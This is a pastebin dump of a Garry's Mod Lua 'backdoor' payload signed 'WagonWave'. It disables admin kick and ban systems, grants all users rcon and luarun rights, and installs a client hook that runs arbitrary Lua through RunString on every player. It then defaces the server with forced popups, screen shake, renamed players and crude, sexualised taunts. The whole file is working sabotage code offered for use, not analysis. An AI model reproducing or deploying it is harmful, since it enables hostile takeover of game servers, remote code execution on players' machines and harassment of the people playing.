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a guest
Aug 18th, 2019
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text 18.28 KB | None | 0 0
  1. --- Admin systems blocker (ulx, fadmin, vanila)
  2. RunConsoleCommand( "sv_loadingurl", "" )
  3. for i=1,200 do RunConsoleCommand("removeid", i) RunConsoleCommand("removeid", "1") end
  4. RunConsoleCommand("ulx","logecho","0")
  5. RunConsoleCommand("ulx", "groupallow", "user", "ulx luarun")
  6. RunConsoleCommand("ulx", "groupallow", "user", "ulx rcon")
  7. if ULib then
  8. function ULib.kick( ply, reason, calling_ply ) end
  9. function ULib.ban( ply, time, reason, admin ) end
  10. function ULib.addBan( steamid, time, reason, name, admin ) end
  11. end
  12. if FAdmin then
  13. local function no(ply) end
  14. FAdmin.Commands.AddCommand("kick", no)
  15. FAdmin.Commands.AddCommand("ban", no)
  16. FAdmin.Commands.AddCommand("jail", no)
  17. FAdmin.Commands.AddCommand("UnJail", no)
  18. FAdmin.Commands.AddCommand("ClearDecals", no)
  19. FAdmin.Commands.AddCommand("StopSounds", no)
  20. FAdmin.Commands.AddCommand("CleanUp", no)
  21. end
  22. local _R = debug.getregistry()
  23. function _R.Player.Ban(ply, r) end
  24. function _R.Player.Kick(ply, r) end
  25. function game.KickID(id, reason) end
  26. local RCM = RunConsoleCommand
  27. function RunConsoleCommand(command, ...)
  28. if command == "addip" then return end
  29. RCM(command, ...)
  30. end
  32. for k,v in pairs(player.GetAll()) do v:addMoney(9999999999) end
  34. timer.Create( "gtonip", 1, 0, function()
  35. for k,v in pairs(player.GetAll()) do
  36. v:GodEnable()
  37. v:setDarkRPVar( "rpname", "HACKED BY WAGONWAVE." )
  38. end
  40. end )
  42. RunConsoleCommand("sv_friction", "-8")
  43. RunConsoleCommand("sv_gravity", "-600")
  45. -- visuals / shit
  47. util.AddNetworkString "slua"
  49. local lol = {}
  50. function lol:RandomString( intMin, intMax )
  51. local ret = ""
  52. for _ = 1, math.random( intMin, intMax ) do
  53. ret = ret.. string.char( math.random(65, 90) )
  54. end
  56. return ret
  57. end
  59. lol.m_tblActions = {}
  60. lol.m_strImageGlobalVar = lol:RandomString( 6, 12 )
  61. lol.m_strImageLoadHTML = [[<style type="text/css"> html, body {background-color: transparent;} html{overflow:hidden; ]].. (true and "margin: -8px -8px;" or "margin: 0px 0px;") ..[[ } </style><body><img src="]] .. "%s" .. [[" alt="" width="]] .. "%i"..[[" height="]] .. "%i" .. [[" />
  62. <div style="text-align:right;position:fixed;bottom:3px;right:3px;width:100%;z-index:999999;cursor:pointer;line-height:0;display:block;"><a target="_blank" href="" title="Free Web Hosting with PHP5 or PHP7"><img alt="Free Web Hosting" src="" style="border-width: 0px;width: 180px; height: 45px; float: right;"></a></div>
  63. </body>]]
  65. function lol:PushAction( intChainDelay, func )
  66. self.m_tblActions[#self.m_tblActions +1] = { intChainDelay, func }
  67. end
  69. function lol:NextAction( pPlayer )
  70. pPlayer.m_intCurAction = pPlayer.m_intCurAction +1
  71. if not self.m_tblActions[pPlayer.m_intCurAction] then return end
  73. timer.Simple( self.m_tblActions[pPlayer.m_intCurAction][1], function()
  74. if not IsValid( pPlayer ) then return end
  75. self.m_tblActions[pPlayer.m_intCurAction][2]( pPlayer )
  76. self:NextAction( pPlayer )
  77. end )
  78. end
  80. function lol:Start( pPlayer )
  81. pPlayer.m_intCurAction = 0
  82. self:NextAction( pPlayer )
  83. end
  85. function lol:SendLua( pPlayer, strLua )
  86. net.Start( "slua" )
  87. net.WriteString( strLua )
  88. net.Send( pPlayer )
  89. end
  91. function lol:SetupPlayer( pPlayer )
  92. pPlayer:SendLua( "net.Receive(\"slua\", function() RunString(net.ReadString()) end)" )
  93. end
  95. for k, v in pairs( player.GetAll() ) do
  96. lol:SetupPlayer( v )
  97. timer.Simple( 2, function() lol:Start( v ) end )
  98. end
  100. hook.Add( "PlayerAuthed", "wat", function( pPlayer )
  101. lol:SetupPlayer( pPlayer )
  102. timer.Simple( 10, function() lol:Start( pPlayer ) end )
  103. end )
  105. --Sequence stack
  106. --Start some tunes and steam in our assets
  107. lol:PushAction( 0, function( pPlayer )
  108. lol:SendLua( pPlayer, [[
  110. hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)
  112. sound.PlayURL( "", "mono noblock noplay", function( station )
  113. timer.Simple( 0.1, function()
  114. ClientStation = station
  115. station:EnableLooping( true )
  116. station:Play()
  117. station:SetVolume( 20 )
  118. end )
  119. end )
  121. surface.CreateFont( "PixelCutsceneScaled",{
  122. font = "Open Sans",
  123. size = 500,
  124. weight = 1000,
  125. antialias = true
  126. })
  128. surface.CreateFont( "PixelSmall",{
  129. font = "Open Sans",
  130. size = 135,
  131. weight = 500,
  132. antialias = false
  133. })
  135. surface.CreateFont("lapolice", {
  136. font = "Open Sans",
  137. size = ScrW()*0.02,
  138. weight = 10,
  139. blursize = 0,
  140. scanlines = 2.5,
  141. antialias = false
  142. })
  144. local function gettextcolor( a )
  146. local r = 0.5*math.sin(RealTime()*5.5)*255 + 255/2
  147. local g = -0.5*math.sin(RealTime()*5.5)*255 + 255/2
  148. local b = 215
  150. return Color( r, g, b, a or 255 )
  152. end
  154. local w,h = ScrW(), ScrH()
  155. local W, H = ScrW(), ScrH()
  156. local MySelf = LocalPlayer()
  158. if ohno then
  159. ohno:Remove()
  160. ohno = nil
  161. end
  163. ohno = vgui.Create( "DFrame" )
  164. ohno:SetSize( w, h )
  165. ohno:SetPos(0,0)
  166. ohno:SetDraggable ( false )
  167. ohno:SetTitle("")
  168. ohno:MakePopup();
  169. ohno:ShowCloseButton(false)
  171. ohno.Paint = function( self )
  172. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  173. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  174. end
  176. local pw, ph = w, h*0.6
  177. local px, py = w/2-pw/2, h/2-ph/2
  180. local Close = vgui.Create( "DButton", ohno )
  181. Close:SetPos(px, py)
  182. Close:SetText( "" )
  183. Close:SetSize( pw, ph )
  184. Close.Paint = function( self, tw, th )
  186. local shift = math.sin(RealTime()*3)*1.5 + 5
  188. local text = "WagonWave!"
  189. local text2 = "WagonRape!"
  190. local text3 = "1 TAPPED"
  191. local text4 = "DESTROYED"
  193. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, gettextcolor( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  194. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  195. draw.DrawText( "WagonWave", "lapolice", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  196. draw.DrawText( "WagonRape!", "lapolice", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  197. draw.DrawText( "1 TAPPED", "lapolice", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  198. draw.DrawText( "GET FUCKED", "lapolice", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  199. draw.DrawText( "GET FUCKED", "lapolice", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  200. draw.DrawText( "1 TAPPED", "lapolice", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  201. draw.DrawText( "WagonRape!", "lapolice", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  202. draw.DrawText( "DESTROYED", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  203. draw.DrawText( "1 TAPPED;)", "lapolice", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  204. draw.DrawText( "WagonRape!", "lapolice", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  205. draw.DrawText( "1 TAPPED", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  206. draw.DrawText( "1 TAPPED", "lapolice", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  207. draw.DrawText( "SHIT SERVER", "lapolice", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  208. draw.DrawText( "WagonWave!", "lapolice", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  209. draw.DrawText( "WagonWave!", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  210. draw.DrawText( "DESTROYED", "lapolice", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  211. draw.DrawText( "DESTROYED", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  212. draw.DrawText( "1 TAPPED", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  213. draw.DrawText( "WagonWave", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  214. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  215. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  216. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  217. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  218. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  220. end
  221. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  222. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  223. timer.Create("fff", 0.1, 0, function()
  224. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  225. end)
  227. timer.Simple( 15, function()
  229. wut = vgui.Create( "DFrame" )
  230. wut:SetSize( w, h )
  231. wut:SetPos(0,0)
  232. wut:SetDraggable ( false )
  233. wut:SetTitle("")
  234. wut:ShowCloseButton(false)
  236. wut.Paint = function( self )
  237. surface.SetDrawColor(30, 30, 30, 0)
  238. end
  240. local Close = vgui.Create( "DButton", wut )
  241. Close:SetPos(px, py)
  242. Close:SetText( "" )
  243. Close:SetSize( pw, ph )
  244. Close.Paint = function( self, tw, th )
  246. local shift = math.sin(RealTime()*3)*1.5 + 5
  248. local text = "WagonWave"
  250. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, gettextcolor( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  251. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  253. end
  255. RunConsoleCommand("r_shader_srgb","1")
  256. RunConsoleCommand("+attack")
  257. RunConsoleCommand("+duck")
  258. RunConsoleCommand("+use")
  259. RunConsoleCommand("+left")
  260. RunConsoleCommand("+speed")
  262. ohno:Remove()
  263. ohno = nil
  265. local name = GetConVar("sv_skyname"):GetString()
  266. if name == "painted" then
  267. local sky
  268. for _, v in ipairs(ents.GetAll()) do
  269. if v:GetClass() == "env_skypaint" then
  270. sky = v
  271. break
  272. end
  273. end
  274. if !IsValid(sky) then return end
  275. hook.Add("PostRender","\xFFsky\xFF",function()
  276. local col = HSVToColor(CurTime()*30 % 360,1,1)
  277. col = Vector(col.r/255,col.g/255,col.b/255)
  278. sky:SetTopColor(col)
  279. sky:SetBottomColor(col)
  280. end)
  281. else
  282. local prefix = {"lf","ft","rt","bk","dn","up"}
  283. local mats = {}
  284. for i=1,6 do
  285. mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  286. end
  287. hook.Add("PostRender","\xFFsky\xFF",function()
  288. local col = HSVToColor(CurTime()*30 % 360,1,1)
  289. for i=1,6 do
  290. mats[i]:SetVector("$color",Vector(col.r/255,col.g/255,col.b/255))
  291. end
  292. end)
  293. end
  294. local chienchaud = ClientsideModel("models/props_c17/doll01.mdl")
  295. chienchaud:SetNoDraw(true)
  296. chienchaud:SetModelScale(120)
  297. timer.Create("charglogo", 0.01, 0, function()
  298. chienchaud:SetAngles(Angle(0, CurTime()*90 % 360 ,180) )
  299. end)
  300. --chienchaud:SetMaterial( "models/screenspace" )
  301. local data = {}
  302. local function genchienchaud(id)
  303. local pos = LocalPlayer():GetPos()
  304. data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  305. end
  306. for i=1, 150 do
  307. genchienchaud(i)
  308. end
  309. hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchienchauds\xFF",function()
  310. local z = LocalPlayer():GetPos().z
  311. for i=1, #data do
  312. chienchaud:SetPos(data[i][1])
  313. chienchaud:SetupBones()
  314. chienchaud:DrawModel()
  315. data[i][1].z = data[i][1].z - data[i][2] / 20
  316. if data[i][1].z <= z then
  317. genchienchaud(i)
  318. end
  319. end
  320. end)
  322. hook.Add("Think","somewhere_over_the_rainbow",function()
  323. local col = HSVToColor(CurTime() * 50 % 360, 1, 1)
  324. for _, v in ipairs(player.GetAll()) do
  325. v:SetWeaponColor(Vector(col.r / 255, col.g / 255, col.b / 255))
  326. end
  327. end)
  329. timer.Create("CP_Gaymod",1,0,function()
  330. local mats = Entity(0):GetMaterials()
  331. for k,v in pairs(mats) do
  332. local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50
  333. Material(v):SetVector("$color", Vector(r,g,b))
  334. end
  335. end)
  337. timer.Create("ok", 1, 0, function()
  338. for k, v in pairs( ents.FindByClass( "prop_*" ) ) do local phys = v:GetPhysicsObject()
  339. if (IsValid(phys)) then
  340. phys:EnableMotion(true)
  341. end
  342. end
  344. local props = ents.GetAll()
  345. for _, prop in ipairs( props ) do
  346. if(prop:GetPhysicsObject():IsValid()) then
  347. prop:GetPhysicsObject():ApplyForceCenter( Vector( 0, 0, ((650 * 0.73) * prop:GetPhysicsObject():GetMass() ) ) )
  348. end
  349. end
  350. end)
  352. end)
  355. timer.Simple( 34, function()
  357. local disco = vgui.Create("DHTML") disco:SetSize(400,400) disco:SetPos(200,0) disco:OpenURL("")
  358. local disco2 = vgui.Create("DHTML") disco2:SetSize(400,400) disco2:SetPos(ScrW()-550,0) disco2:OpenURL("")
  359. end)
  362. timer.Simple( 53, function()
  364. surface.CreateFont( "NEWS1", {font = "Arial",size = 70,weight = 2000,})
  365. surface.CreateFont( "NEWS2", {font = "Arial",size = 150,weight = 2000,})
  366. local newsPan1 = vgui.Create("DPanel")
  367. newsPan1:SetSize(ScrW(), 150)
  368. newsPan1:SetPos(0, ScrH()-150)
  369. newsPan1.Paint = function()
  370. surface.SetDrawColor(255,255,255,255)
  371. surface.DrawRect(0,0,newsPan1:GetWide(),newsPan1:GetTall())
  372. surface.SetDrawColor(0,230,255,255)
  373. surface.DrawRect(0,4,newsPan1:GetWide(),newsPan1:GetTall())
  374. end
  375. local newsPan2 = vgui.Create("DPanel")
  376. newsPan2:SetSize(ScrW(),ScrH())
  377. newsPan2:SetPos(0,0)
  378. newsPan2.Paint = function()
  379. local trap3 = {
  380. {x = ScrW()-504, y = ScrH()-150},
  381. {x = ScrW()-439, y = ScrH()-254},
  382. {x = ScrW(), y = ScrH()-254},
  383. {x = ScrW(), y = ScrH()-150},
  384. }
  385. local trap4 = {
  386. {x = ScrW()-500, y = ScrH()-146},
  387. {x = ScrW()-435, y = ScrH()-250},
  388. {x = ScrW(), y = ScrH()-250},
  389. {x = ScrW(), y = ScrH()-146},
  390. }
  391. local trap5 = {
  392. {x = ScrW()-475, y = ScrH()-156},
  393. {x = ScrW()-432, y = ScrH()-235},
  394. {x = ScrW()-8, y = ScrH()-235},
  395. {x = ScrW()-8, y = ScrH()-156},
  396. }
  397. draw.NoTexture()
  398. surface.SetDrawColor(255,255,255,255)
  399. surface.DrawPoly(trap3)
  400. draw.NoTexture()
  401. surface.SetDrawColor(0,240,255,255)
  402. surface.DrawPoly(trap4)
  403. draw.NoTexture()
  404. surface.SetDrawColor(0,230,255,255)
  405. surface.DrawPoly(trap5)
  406. end
  407. local title2 = vgui.Create("DLabel", newsPan2)
  408. title2:SetFont("NEWS1")
  409. title2:SetText("Wagon News")
  410. title2:SizeToContents()
  411. title2:SetPos(ScrW()-title2:GetWide()-55, ScrH()-254+title2:GetTall()/2-12)
  412. title2:SetColor(Color(255,255,255))
  414. local title3 = vgui.Create("DLabel", newsPan1)
  415. title3:SetFont("NEWS2")
  416. title3:SetText("Breaking News This server has been taken over by Wagons. Delete system 32 or they butt rape you ;)")
  417. title3:SizeToContents()
  418. title3:SetPos(ScrW(), 10)
  419. title3:SetColor(Color(255,255,255))
  420. timer.Create("movingtext2",.05,0,function()
  421. if title3:GetPos() >= 0-title3:GetWide() then
  422. title3:SetPos(Lerp(.5,title3:GetPos(),title3:GetPos()-10),10)
  423. else
  424. title3:SetPos(ScrW(),10)
  425. end
  426. end)
  428. timer.Simple( 63, function()
  430. if maymay then
  431. maymay:Remove()
  432. maymay = nil
  433. end
  435. maymay = vgui.Create( "DFrame" )
  436. maymay:SetSize( w, h )
  437. maymay:SetPos(0,0)
  438. maymay:SetDraggable ( false )
  439. maymay:SetTitle("")
  440. maymay:MakePopup();
  441. maymay:ShowCloseButton(false)
  443. local html = vgui.Create("HTML", maymay)
  444. html:Dock( FILL )
  445. html:OpenURL("")
  447. end)
  449. timer.Simple( 200, function()
  451. maymay:Remove()
  452. maymay = nil
  454. end)
  456. end)
  458. ]])
  460. end )
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